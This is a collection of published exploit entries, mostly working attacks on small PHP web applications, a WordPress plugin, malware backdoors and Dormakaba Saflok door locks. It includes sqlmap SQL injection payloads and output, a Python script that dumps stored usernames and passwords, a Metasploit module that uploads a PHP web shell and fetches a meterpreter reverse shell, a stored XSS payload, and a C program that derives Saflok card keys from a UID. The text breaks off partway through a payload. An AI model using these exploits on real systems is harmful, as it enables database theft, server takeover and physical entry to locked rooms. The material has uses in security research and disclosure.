<pre><code># Exploit Title: Simple Student Attendance System v1.0 - 'classid' Time Based Blind & Union Based SQL Injection<br /># Date: 26 December 2023<br /># Exploit Author: Gnanaraj Mauviel (@0xm3m)<br /># Vendor: oretnom23<br /># Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip<br /># Version: v1.0<br /># Tested on: Mac OSX, XAMPP, Apache, MySQL<br /><br />-------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Source Code(/php-attendance/classes/actions.class.php):<br /><br />public function attendanceStudents($class_id = "", $class_date = ""){<br />if(empty($class_id) || empty($class_date))<br />return [];<br />$sql = "SELECT `students_tbl`.*, COALESCE((SELECT `status` FROM `attendance_tbl` where `student_id` = `students_tbl`.id and `class_date` = '{$class_date}' ), 0) as `status` FROM `students_tbl` where `class_id` = '{$class_id}' order by `name` ASC";<br />$qry = $this->conn->query($sql);<br />$result = $qry->fetch_all(MYSQLI_ASSOC);<br />return $result;<br />}<br /><br />-> sqlmap -u "http://localhost/php-attendance/?page=attendance&class_id=446&class_date=0002-02-20" --batch<br />---<br />Parameter: class_id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=attendance&class_id=446' AND (SELECT 5283 FROM (SELECT(SLEEP(5)))zsWT) AND 'nqTi'='nqTi&class_date=0002-02-20<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 6 columns<br /> Payload: page=attendance&class_id=446' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x7154766a5453645a7a4d497071786a6f4b647a5a6d4162756c72636b4a4555746d555a5a71614d4c,0x71767a7a71),NULL-- -&class_date=0002-02-20<br />---<br /><br /><br /><br /><br />---------------<br /><br /># Exploit Title: Simple Student Attendance System - Time Based Blind SQL Injection<br /># Date: 26 December 2023<br /># Exploit Author: Gnanaraj Mauviel (@0xm3m)<br /># Vendor: oretnom23<br /># Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip<br /># Version: v1.0<br /># Tested on: Mac OSX, XAMPP, Apache, MySQL<br /><br />-------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Source Code(/php-attendance/classes/actions.class.php):<br /><br />public function delete_student(){<br />extract($_POST);<br />$delete = $this->conn->query("DELETE FROM `students_tbl` where `id` = '{$id}'");<br />if($delete){<br />$_SESSION['flashdata'] = [ 'type' => 'success', 'msg' => "Student has been deleted successfully!" ];<br />return [ "status" => "success" ];<br />}else{<br />$_SESSION['flashdata'] = [ 'type' => 'danger', 'msg' => "Student has failed to deleted due to unknown reason!" ];<br />return [ "status" => "error", "Student has failed to deleted!" ];<br />}<br />}<br /><br />-> sqlmap -u "http://localhost/php-attendance/ajax-api.php?action=delete_student" --data="id=7" --technique=T --batch<br />---<br />Parameter: id (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=7' AND (SELECT 3738 FROM (SELECT(SLEEP(5)))kVAW) AND 'vAFW'='vAFW<br />---<br /></code></pre>
<pre><code># Exploit Title: Enrollment System v1.0 - SQL Injection<br /># Date: 27 December 2023<br /># Exploit Author: Gnanaraj Mauviel (@0xm3m)<br /># Vendor: Obi08<br /># Vendor Homepage: https://github.com/Obi08/Enrollment_System<br /># Software Link: https://github.com/Obi08/Enrollment_System<br /># Version: v1.0<br /># Tested on: Mac OSX, XAMPP, Apache, MySQL<br /><br />-------------------------------------------------------------------------------------------------------------------------------------------<br /><br />from bs4 import BeautifulSoup<br />import requests<br />import urllib3<br /><br />#The Config class defines three class attributes: BASE_URL, URI, and PAYLOAD.<br /><br />#BASE_URL is set to the string "http://localhost/enrollment_system".<br />#URI is set to the string "/get_subject.php".<br />#PAYLOAD is set to the string "emc' union select 1,concat(user_type,'::',username,'::',password),3,4,5,6 from users-- -".<br /><br />class Config:<br /> BASE_URL = "http://localhost/enrollment_system"<br /> URI = '/get_subject.php'<br /> PAYLOAD = "emc' union select 1,concat(user_type,'::',username,'::',password),3,4,5,6 from users-- -"<br /><br />urllib3.disable_warnings()<br />proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}<br /><br />#This code defines a function called exploit_sqli that exploits a SQL injection vulnerability in a given URL. It takes in a requests.Session object and a Config object as parameters. The function constructs a URL using the BASE_URL and URI properties from the Config object, and creates a dictionary of parameters with a key of 'keyword' and a value of the PAYLOAD property from the Config object.<br />#The function then tries to make a request using the make_request function and returns the response text if successful. If an exception is raised during the request, it prints an error message and returns an empty string.<br /><br />def exploit_sqli(session: requests.Session, config: Config) -> str:<br /> """<br /> Exploits SQL injection vulnerability in the given URL.<br /><br /> Args:<br /> session (requests.Session): The session object to use for making the request.<br /> config (Config): Configuration object containing base URL, URI, and payload.<br /><br /> Returns:<br /> str: The response text from the request.<br /> """<br /> url = f"{config.BASE_URL}{config.URI}"<br /> params = {'keyword': config.PAYLOAD}<br /> <br /> try:<br /> response = make_request(session, url, params)<br /> return response.text<br /> except requests.RequestException as e:<br /> print(f"Request failed: {e}")<br /> return ""<br /> <br />#This code defines a function called make_request that takes in a requests.Session object, a URL string, and a dictionary of parameters. It makes a POST request using the provided session and parameters, and returns the response object. The function has type hints indicating the types of the arguments and the return value. <br /><br />def make_request(session: requests.Session, url: str, params: dict) -> requests.Response:<br /> """<br /> Make a POST request with error handling.<br /><br /> Args:<br /> session (requests.Session): The session object to use for making the request.<br /> url (str): The URL to send the request to.<br /> params (dict): The parameters to include in the request.<br /><br /> Returns:<br /> requests.Response: The response object.<br /> """<br /> return session.post(url, data=params, verify=False, proxies=proxies)<br /><br />#This code snippet defines a function called parse_html that takes a string parameter response_text. It uses the BeautifulSoup library to parse the HTML in response_text and extract specific data from it. It finds all <tr> elements in the HTML, skips the header row, and then iterates over the remaining rows. For each row, it finds all <td> elements and extracts the text content from the second and third column. Finally, it prints a formatted string that includes the extracted data.<br /><br />def parse_html(response_text: str):<br /> soup = BeautifulSoup(response_text, 'html.parser')<br /> rows = soup.find_all('tr')[1:] # Skip the header row<br /><br /> for row in rows:<br /> columns = row.find_all('td')<br /> if columns:<br /> subject_code = columns[1].text.strip()<br /> subject_description = columns[2].text.strip()<br /> print(f"User_Type::Username::Password == {subject_code}")<br /><br />if __name__ == "__main__":<br /> # file deepcode ignore MissingClose: <please specify a reason of ignoring this><br /> session = requests.Session()<br /> response = exploit_sqli(session, Config)<br /> <br /> if response:<br /> parse_html(response)<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />#<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> prepend Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'BoidCMS Command Injection',<br /> 'Description' => %q{<br /> This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0<br /> and below. BoidCMS allows the authenticated upload of a php file as media if the file has<br /> the GIF header, even if the file is a php file.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> '1337kid', # Discovery<br /> 'bwatters-r7' # Metasploit Module<br /> ],<br /> 'References' => [<br /> [ 'CVE', '2023-38836' ],<br /> [ 'URL', 'https://github.com/1337kid/CVE-2023-38836']<br /> ],<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [<br /> 'nix Command',<br /> {<br /> 'Platform' => ['linux', 'unix', 'python'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',<br /> 'FETCH_COMMAND' => 'WGET',<br /> 'FETCH_WRITABLE_DIR' => '/tmp'<br /> }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => ['windows', 'python'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp',<br /> 'FETCH_WRITABLE_DIR' => '%TEMP%',<br /> 'FETCH_COMMAND' => 'CURL'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-07-13',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'The path', '']),<br /> OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),<br /> OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),<br /> OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])<br /><br /> ])<br /> @token = nil<br /> @shell_filename = nil<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'admin'),<br /> 'keep_cookies' => true,<br /> 'method' => 'GET'<br /> )<br /> if res && res.code == 200<br /> title = res.get_html_document.xpath('//title').first.to_s<br /> return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')<br /> end<br /> return Exploit::CheckCode::Safe('Unable to retrieve BoidCMS title page')<br /> end<br /><br /> def extract_token(res)<br /> token = nil<br /> if res && res.code == 200<br /> token = res.get_html_document.xpath("//input[@name='token']/@value").first<br /> end<br /> token<br /> end<br /><br /> def cms_token<br /> # initial login<br /> return @token unless @token.nil?<br /><br /> vprint_status('Getting Token')<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'admin'),<br /> 'keep_cookies' => true,<br /> 'method' => 'GET'<br /> )<br /> @token = extract_token(res)<br /> end<br /><br /> def cms_login?(login_token)<br /> vprint_status('Logging into CMS')<br /> cms_password = datastore['CMS_PASSWORD']<br /> cms_username = datastore['CMS_USERNAME']<br /> vars_form_data =<br /> [<br /> {<br /> 'name' => 'username',<br /> 'data' => cms_username<br /> },<br /> {<br /> 'name' => 'password',<br /> 'data' => cms_password<br /> },<br /> {<br /> 'name' => 'login',<br /> 'data' => 'Login'<br /> },<br /> {<br /> 'name' => 'token',<br /> 'data' => login_token.to_s<br /> }<br /> ]<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'admin'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_form_data' => vars_form_data<br /> )<br /> res && res.code == 302<br /> end<br /><br /> def upload_php?(login_token, shell_filename)<br /> vprint_status("Uploading PHP file #{shell_filename}")<br /> vars_form_data =<br /> [<br /> {<br /> 'name' => 'file',<br /> 'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',<br /> 'filename' => shell_filename<br /> },<br /> {<br /> 'name' => 'token',<br /> 'data' => login_token.to_s<br /> },<br /> {<br /> 'name' => 'upload',<br /> 'data' => 'Upload'<br /> }<br /> ]<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'admin'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_get' => {<br /> 'page' => 'media'<br /> },<br /> 'vars_form_data' => vars_form_data<br /> )<br /> res && res.code == 302<br /> end<br /><br /> def launch_payload(shell_filename, payload_cmd)<br /> # send the command to the php page<br /> vprint_status('launching Payload')<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true,<br /> 'vars_get' =><br /> {<br /> 'cmd' => payload_cmd<br /> }<br /> )<br /> end<br /><br /> def exploit<br /> @shell_filename = datastore['PHP_FILENAME']<br /> login_token = cms_token<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?<br /> fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)<br /> if upload_php?(login_token, @shell_filename)<br /> register_file_for_cleanup @shell_filename<br /> launch_payload(@shell_filename, payload.encoded)<br /> else<br /> fail_with(Failure::UnexpectedReply, 'Failed to upload php files')<br /> end<br /> end<br /><br />end<br /></code></pre>
<pre><code>- Title: Membership Management System - SQL injection<br />- Application: Hospital Management System<br />- Date: 01.03.2024<br />- Bugs: SQL injection<br />- Exploit Author: SoSPiro<br />- Vendor Homepage: https://codeastro.com/author/nbadmin/<br />- Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/<br />- Version: 1.0<br />- Tested on: Windows 10 64 bit Wampserver<br /><br />### Vulnerability Description:<br /><br />The provided payload in the POST request indicates a potential SQL injection vulnerability. Specifically, the manipulation within the email and password parameters suggests an attempt to influence the SQL query directly, presenting a risk for exploiting security vulnerabilities.<br /><br />### SQL Injection:<br /><br />This manipulated submission aims to affect the SQL query by incorporating user input. For instance, the use of **sleep(5)** introduces a time-delay technique, indicative of a potential resource-consuming attack vector by malevolent actors.<br /><br /><br /><br />### Proof of Concept (PoC):<br /><br />Below is an example payload illustrating the SQL injection vulnerability:<br /><br />```<br />email=test@123.asd' + (SELECT * FROM (SELECT (SLEEP(5)))a) +'&password=admin' or '1'='1'&login=<br />```<br /><br />In this example, the **sleep(5)** function is employed to induce a time delay, followed by the use of or **'1'='1'** in the password control section, aiming to always evaluate as true.<br /><br />- Request Response<br /><br />[PoC FoTo](https://gcdnb.pbrd.co/images/9k8xy4YRomp3.png?o=1)<br /><br /><br />### Vulnerable Code Section:<br /><br />```php<br />$email = $_POST['email'];<br />$password = $_POST['password'];<br /><br />$hashed_password = md5($password);<br />$sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'";<br />```<br /><br />The provided PHP code section exacerbates the SQL injection risk by directly incorporating user input into the SQL query. To mitigate this vulnerability, the use of parameterized queries or prepared statements is recommended.<br /><br /><br />## Reproduce: https://sospiro014.github.io/Membership-Management-System-SQL-injection<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/2a442d3da88f721a786ff33179c664b7.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Agent.amt<br />Vulnerability: Authentication Bypass<br />Description: The malware can run an FTP server which listens on TCP port 2121. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders can then upload executables using ftp PASV, STOR commands, this can result in remote code execution.<br />Family: Agent<br />Type: PE32<br />MD5: 2a442d3da88f721a786ff33179c664b7<br />Vuln ID: MVID-2024-0673<br />Disclosure: 02/28/2024 <br /><br /><br />Exploit/PoC:<br />C:\sec>nc64.exe 192.168.18.125 2121<br />220 Welcome To mybr Ftp!<br />USER gg<br />331 Password required for gg.<br />PASS gg<br />230 User gg logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />CDUP<br />250 CWD command successful. "C:/" is current directory.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,211,164).<br />STOR DOOM_SM.exe<br />150 Opening data connection for DOOM_SM.exe.<br />226 File received ok<br /><br />from socket import *<br />import time<br /><br />HOST = "192.168.18.125"<br />PORT = 54180<br />BUF_SIZE = 32<br />s=socket(AF_INET, SOCK_STREAM)<br />s.connect((HOST, PORT))<br /><br />with open("DOOM_SM.exe", "rb") as f:<br /> while True: <br /> bytez = f.read(BUF_SIZE)<br /> if not bytez:<br /> break<br /> s.send(bytez)<br /> time.sleep(0.5)<br /><br />print("By malvuln")<br />s.close()<br /><br />1/23/2024 9:13:03 PM - gg - 0.0.0.0 Disconnected<br />1/23/2024 9:10:36 PM - gg - 0.0.0.0 STOR C:\DOOM_SM.exe<br />1/23/2024 9:09:54 PM - gg - PASV C:\<br />1/23/2024 9:09:44 PM - CD C:\<br />1/23/2024 9:09:44 PM - gg - CDUP C:\<br />1/23/2024 9:09:18 PM - gg - SYST C:\<br />1/23/2024 9:09:15 PM - gg<br />1/23/2024 9:09:15 PM - gg - PASS C:\TEMP\hate<br />1/23/2024 9:09:12 PM - - USER C:\TEMP\gg<br />1/23/2024 9:09:06 PM - - Connected<br />1/23/2024 9:08:58 PM - FTP Started<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024<br />Original source: https://malvuln.com/advisory/d6b192a4027c7d635499133ca6ce067f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Jeemp.c<br />Vulnerability: Cleartext Hardcoded Credentials<br />Description: The malware listens on three TCP ports which are randomized e.g. 9719,7562,8687,8948,7376,8396 so forth. There is an ESMTP server component "jeem.mail.pv" requiring authentication for the GDATA, SDATA commands and sample is packed using UPX. However, it is trivial to unpack using the -d flag which reveals the cleartext hardcoded credentials "jeepower" and "jeespower" in the PE file.<br />Family: Jeemp<br />Type: PE32<br />MD5: d6b192a4027c7d635499133ca6ce067f<br />Vuln ID: MVID-2024-0672<br />Dropped files: msrexe.exe<br />Disclosure: 02/28/2024<br /><br />Exploit/PoC:<br />TELNET x.x.x.x 7562<br />220 jeem.mail.pv ESMTP<br />HELO hate<br />250 ok<br />GDATA<br />250 ok<br />Need password<br />jeepower<br />[prx]#######<br />250 ok<br /><br />SDATA<br />250 ok<br />Need password<br />abc123!<br />503 wrong!<br />SDATA<br />250 ok<br />Need password<br />jeespower<br />250 ok<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: IDonate – blood request management system <=1.8.1 - Stored<br />Cross-Site Scripting (Authenticated)<br /># Date: 29-02-2024<br /># Exploit Author: Laburity Research Team<br /># Vendor Homepage: https://wordpress.org/plugins/idonate/<br /># Version: <=1.8.1<br /># Tested on: Firefox<br /># Contact me: contact [at] laburity.com<br /><br /># Summary:<br /><br />A cross site scripting stored vulnerability has been identified in<br />WordPress Plugin IDonate – blood request management system version less<br />then 1.8.1. that allows Authenticated users to run arbitrary javascript<br />code inside WordPress using blood request management system Plugin.<br /><br /># POC<br /><br />1- Navigate to<br />http://localhost:10003/wp-admin/admin.php?page=idonate-setting-admin<br />2- Enter payload "><h1 onclick=alert(1)>XSS</h1> in Recaptcha secret key<br />and in Recaptcha Site key<br />3- Click on save changes.<br />4- While clicking on the payload text, XSS will trigger.<br /><br /><br /># Vulnerable Code:<br /><br />```<br /> public function idonate_recaptcha_secretkey_callback()<br /> {<br /><br />if( isset( $this->general_options['idonate_recaptcha_secretkey'] ) ){<br />$secretkey = $this->general_options['idonate_recaptcha_secretkey'];<br />}else{<br />$secretkey = '';<br />}<br /><br />//<br /> printf(<br /> '<input type="text" id="idonate_recaptcha_secretkey" value="%s"<br />name="idonate_general_option_name[idonate_recaptcha_secretkey]" />',<br /> $secretkey<br /> );<br /><br /> }<br />```<br /><br />Secrets keys (idonate_recaptcha_secretkey) are printed without sanitization.<br /></code></pre>
<pre><code>// Exploit Title: Saflok KDF<br />// Date: 2023-10-29<br />// Exploit Author: a51199deefa2c2520cea24f746d899ce<br />// Vendor Homepage: https://www.dormakaba.com/<br />// Version: System 6000<br />// Tested on: Dormakaba Saflok cards<br />// CVE: N/A<br /><br />#include <stdio.h><br />#include <stdint.h><br /><br />#define MAGIC_TABLE_SIZE 192<br />#define KEY_LENGTH 6<br />#define UID_LENGTH 4<br /><br />int main(int argc, char *argv[]) {<br /> if (argc != 2) {<br /> printf("Usage: %s <32-bit uid value in hexadecimal format>\n", argv[0]);<br /> return 1;<br /> }<br /><br /> uint8_t magic_table[MAGIC_TABLE_SIZE] = {<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xF0, 0x57, 0xB3, 0x9E, 0xE3, 0xD8,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x96, 0x9D, 0x95, 0x4A, 0xC1, 0x57,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x43, 0x58, 0x0D, 0x2C, 0x9D,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFF, 0xCC, 0xE0, 0x05, 0x0C, 0x43,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x34, 0x1B, 0x15, 0xA6, 0x90, 0xCC,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x89, 0x58, 0x56, 0x12, 0xE7, 0x1B,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xBB, 0x74, 0xB0, 0x95, 0x36, 0x58,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFB, 0x97, 0xF8, 0x4B, 0x5B, 0x74,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xC9, 0xD1, 0x88, 0x35, 0x9F, 0x92,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x92, 0xE9, 0x7F, 0x58, 0x97,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x16, 0x6C, 0xA2, 0xB0, 0x9F, 0xD1,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x27, 0xDD, 0x93, 0x10, 0x1C, 0x6C,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xDA, 0x3E, 0x3F, 0xD6, 0x49, 0xDD,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x58, 0xDD, 0xED, 0x07, 0x8E, 0x3E,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x5C, 0xD0, 0x05, 0xCF, 0xD9, 0x07,<br /> 0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x11, 0x8D, 0xD0, 0x01, 0x87, 0xD0<br /> };<br /><br /> uint8_t uid[UID_LENGTH];<br /> sscanf(argv[1], "%2hhx%2hhx%2hhx%2hhx", &uid[0], &uid[1], &uid[2], &uid[3]);<br /><br /> uint8_t magic_byte = (uid[3] >> 4) + (uid[2] >> 4) + (uid[0] & 0x0F);<br /> uint8_t magickal_index = (magic_byte & 0x0F) * 12 + 11;<br /><br /> uint8_t key[KEY_LENGTH] = {magic_byte, uid[0], uid[1], uid[2], uid[3], magic_byte};<br /> uint8_t carry_sum = 0;<br /><br /> for (int i = KEY_LENGTH - 1; i >= 0 && magickal_index >= 0; i--, magickal_index--) {<br /> uint16_t keysum = key[i] + magic_table[magickal_index];<br /> key[i] = (keysum & 0xFF) + carry_sum;<br /> carry_sum = keysum >> 8;<br /> }<br /><br /> printf("Generated Key: ");<br /> for (int i = 0; i < KEY_LENGTH; i++) {<br /> printf("%02X", key[i]);<br /> }<br /> printf("\n");<br /><br /> return 0;<br />}<br /> <br /></code></pre>
<pre><code># Exploit Title: Blood Bank v1.0 SQL Injection Vulnerability<br /># Date: 2023-11-14<br /># Exploit Author: Ersin Erenler<br /># Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code<br /># Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip<br /># Version: 1.0<br /># Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0<br /># CVE : CVE-2023-46014, CVE-2023-46017, CVE-2023-46018<br /><br />-------------------------------------------------------------------------------<br /><br />1. Description:<br /><br />The lack of proper input validation and sanitization on the 'hemail' and 'hpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database.<br /><br />Vulnerable File: /hospitalLogin.php<br /><br />Parameter Names: hemail, hpassword<br /><br />2. Proof of Concept:<br />----------------------<br /><br />Execute sqlmap using either the 'hemain' or 'hpassword' parameter to retrieve the current database:<br /><br />sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p hemail --risk 3 --level 3 --dbms mysql --batch --current-db<br /><br />SQLMap Response:<br />----------------------<br />Parameter: hemail (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 6 columns<br /> Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login<br /><br /><br />-------------------------------------------------------------------------------<br /><br />1. Description:<br /><br />The lack of proper input validation and sanitization on the 'remail' and 'rpassword' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database<br /><br />Vulnerable File: /receiverLogin.php<br /><br />Parameter Names: remail, rpassword<br /><br />2. Proof of Concept:<br />----------------------<br /><br />Execute sqlmap using either the 'remail' or 'rpassword' parameter to retrieve the current database:<br /><br />sqlmap -u "http://localhost/bloodbank/file/receiverLogin.php" --method POST --data "remail=test@test&rpassword=test&rlogin=Login" -p remail --risk 3 --level 5 --dbms mysql --batch --current-db<br /><br />sqlmap -u "http://localhost/bloodbank/file/hospitalLogin.php" --method POST --data "hemail=test@test&hpassword=test&hlogin=Login" -p rpassword --risk 3 --level 5 --dbms mysql --batch --current-db<br /><br />SQLMap Response:<br />----------------------<br />---<br />Parameter: remail (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 7 columns<br /> Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login<br />---<br />---<br />Parameter: rpassword (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /> Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: remail=test@test&rpassword=test' AND 